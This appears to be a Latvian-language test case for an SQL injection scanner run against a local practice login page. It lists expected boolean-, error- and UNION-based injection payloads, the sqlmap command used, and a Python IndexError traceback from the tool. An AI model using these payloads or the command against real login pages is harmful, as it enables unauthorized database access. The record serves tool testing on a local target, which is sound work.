=================================================================================
1. Īpašība: pseidorealistiska interveikla login lappuse
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: email=test' or 1=1-- -&password=test
3.2. error-based: email=test'&password=test
3.3. time-based: -
3.4. union: email=test' UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13-- -&password=test
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 
6. Palaistā komanda
sqlmap -u "http://localhost:3000/rest/user/login" --data="email=test&password=test" --risk=3 --level=5 --ignore-code 401

=================================================================================
izmesta kļūda failā "lib/utils/debug_clear_isInjection.py", line 60, in balance_and_correct_segment
	if i == len(segmentsA) or len(segmentsB[i]) > len(segmentsA[i]):
IndexError: list index out of range